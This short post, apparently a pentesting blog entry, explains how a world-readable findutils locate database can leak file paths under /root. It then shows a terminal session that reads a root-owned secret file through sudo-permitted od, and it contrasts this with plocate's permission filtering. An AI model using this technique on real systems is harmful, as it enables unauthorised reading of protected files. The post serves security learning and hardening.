Leaking file paths with findutils locate
Say you are trying to escalate privileges on a linux box. You’ve found out that one of the binaries you are allowed to run as sudo enables you to read arbitrary files.
lowpriv@ubuntubox:~$ sudo -l
Matching Defaults entries for lowpriv on ubuntubox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User lowpriv may run the following commands on ubuntubox:
(root) NOPASSWD: /usr/bin/od
You poke around, try to guess some paths for potentially interesting files, but you find nothing of use.
In this situation locate from findutils may come in handy if present on the box. The default db file of this version of locate is world readable and may disclose paths for files that your user has no access to.
lowpriv@ubuntubox:~$ ls -la /var/cache/locate/locatedb
-rw-r--r-- 1 root root 1208122 Dec 5 21:37 /var/cache/locate/locatedb
lowpriv@ubuntubox:~$ locate -r '^/root/'
/root/.bash_history
/root/.bashrc
/root/.profile
/root/.viminfo
/root/stuff
/root/stuff/secret.txt
lowpriv@ubuntubox:~$ # now use `od` to read secret.txt
lowpriv@ubuntubox:~$ printf "$(sudo od -An -c -w9999 /root/stuff/secret.txt | sed 's/ //g')"
Secret stuff...
More secret stuff...
Interestingly, plocate does not have this problem. The db file is not world-readable, and the command output seems to be filtered based on user permissions.
lowpriv@ubuntubox:~$ ls -la /var/lib/plocate/plocate.db
-rw-r----- 1 root plocate 2270301 Dec 6 21:37 /var/lib/plocate/plocate.db
lowpriv@ubuntubox:~$ /usr/bin/plocate -r '^/root'
/root